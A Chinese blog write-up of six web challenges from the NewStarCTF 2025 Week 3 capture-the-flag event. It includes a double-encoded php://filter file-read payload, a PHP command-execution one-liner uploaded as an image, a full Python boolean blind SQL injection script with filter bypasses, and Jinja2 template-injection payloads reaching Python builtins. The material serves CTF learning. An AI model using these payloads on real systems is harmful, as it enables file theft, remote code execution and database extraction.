NewStarCTF2025-Week3-Web

kali-Myon2025-10-27 16:21

目录

1、mygo!!!

2、ez-chain

3、小E的秘密计划

4、mirror_gate

5、白帽小K的故事(2)

6、who'ssti

1、mygo!!!

存在flag.php

直接用file协议读

2、ez-chain

URL+rot13编码绕过一下就行了

python 复制代码 
def double_encode(s):
    return ''.join('%25{:02x}'.format(ord(c)) for c in s)
s_root_flag = "php://filter/read=string.rot13/resource=/flag"
print(double_encode(s_root_flag))

Payload:

python 复制代码 
?file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2572%2565%2561%2564%253d%2573%2574%2572%2569%256e%2567%252e%2572%256f%2574%2531%2533%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%252f%2566%256c%2561%2567

3、小E的秘密计划

提示备份文件,直接试一下www.zip

提示git

找到用户名和密码:git cat-file -p f3d34d7cb96b5bcdcda980a1413d2e35154e98de

提示mac写的这段代码

应该存在DS 泄露,访问 .DS_Store

拿到文件名之后访问即可看到flag

4、mirror_gate

源码里看到提示

扫描一下,存在配置文件

会将 .webp 的文件当做php解析

直接传,内容稍作绕过即可:

<?=`tac /f*`?>

5、白帽小K的故事(2)

提示盲注

很明显可以看到回显不同

布尔盲注

过滤了空格,用括号换个写法就行了

flag不在当前数据库,在Flag数据库

表名和字段名都是flag

Exp:

python 复制代码 
# author:My6n

import requests
import string

url = 'https://eci-2zefxfrs15rs8gpgz6j6.cloudeci1.ichunqiu.com:80/search'
dic = string.digits+string.ascii_letters+'{}-_,'
out = ''
Cookie = {'Cookie':'Hm_lvt_2d0601bd28de7d49818249cf35d95943=1759757336,1759973191,1760016294,1760146947'}
for j in range(1,80):
    for k in dic:
        #payload = {"name":"amiya'&&if(substr(database(),1,1)='t',1,0)#"}
        #payload = {"name":f"amiya'&&if(substr((select(group_concat(schema_name))from(information_schema.schemata)),{j},1)='{k}',1,0)#"}
        #payload = {"name":f"amiya'&&if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='Flag')),{j},1)='{k}',1,0)#"}
        #payload = {"name": f"amiya'&&if(substr((select(group_concat(column_name))from(information_schema.columns)where((table_schema='Flag')and(table_name='flag'))),{j},1)='{k}',1,0)#"}
        payload = {"name": f"amiya'&&if(substr((select(flag)from(Flag.flag)),{j},1)='{k}',1,0)#"}
        re = requests.post(url, data=payload ,cookies=Cookie)
        #print(re.text)
        if "ok" in re.text:
            out += k
            break
    print(out)

6、who'ssti

提交的内容会被Jinja2 当作模板渲染

调用到随机生成的那些函数就可以了

Payload:

python 复制代码 
{{ lipsum.__globals__.__builtins__.__import__('re').findall('a.', 'abcab') }}

{{ lipsum.__globals__.__builtins__.__import__('difflib').get_close_matches('apple', ['ape','april','apple']) }}

{{ lipsum.__globals__.__builtins__.__import__('random').choice([1,2,3,4]) }}

{{ lipsum.__globals__.__builtins__.__import__('json').load(lipsum.__globals__.__builtins__.__import__('io').StringIO('{"a":1}')) }}

{{ lipsum.__globals__.__builtins__.__import__('statistics').fmean([1,2,3,4]) }}
相关推荐
祖传F8712 小时前
quickbi数据集数据查询时间字段显示正确,仪表板不显示
数据库·sql·阿里云
qq_2602412312 小时前
将盾CDN:API安全防护与接口防刷实战策略
安全
悟道子HD12 小时前
SRC漏洞挖掘——2.SQL注入漏洞实战详解
sql·web安全·网络安全·渗透测试·sql注入·sqlmap·暴力破解
星幻元宇VR12 小时前
VR科普行走平台适用哪些科普教育主题
科技·学习·安全·vr·虚拟现实
小蒋聊技术13 小时前
电商系列第五课:支付中心——资金安全、幂等设计与 AI 风控大脑
人工智能·安全
dog25014 小时前
细看高维空间中距离度量失效
开发语言·php
汤愈韬14 小时前
网络安全之网络基础知识_2
网络协议·安全·web安全
Swift社区14 小时前
Guardrails 实战:如何为 OpenClaw 构建 AI 行为护栏系统
人工智能·安全·openclaw
二等饼干~za89866815 小时前
源码可控:云罗 GEO 源头工厂,开源搭建 + 二次开发全链路解决方案
服务器·开发语言·开源·php·音视频·ai-native
zhanghongbin0115 小时前
本地持久化:网络故障数据保护
服务器·网络·php
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南07实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09Oh My Codex 快速使用指南10开发者环境配置:用 Ollama 实现本地大模型部署(附下载慢的解决方案